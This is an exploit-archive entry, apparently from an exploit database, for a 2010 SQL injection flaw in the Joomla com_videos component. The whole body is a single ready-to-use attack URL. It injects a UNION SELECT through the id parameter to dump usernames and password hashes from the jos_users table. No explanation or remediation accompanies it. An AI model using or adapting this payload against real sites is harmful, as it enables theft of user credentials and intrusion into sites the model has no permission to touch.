[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla com_videos Remote Sql Injection Vulnerability
# Published : 2010-02-14
# Author : Snakespc
# Previous Title : Joomla (Jw_allVideos) Remote File Download Vulnerability
# Next Title : cPanel Multiple CSRF Vulnerabilities


http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users

Snakespc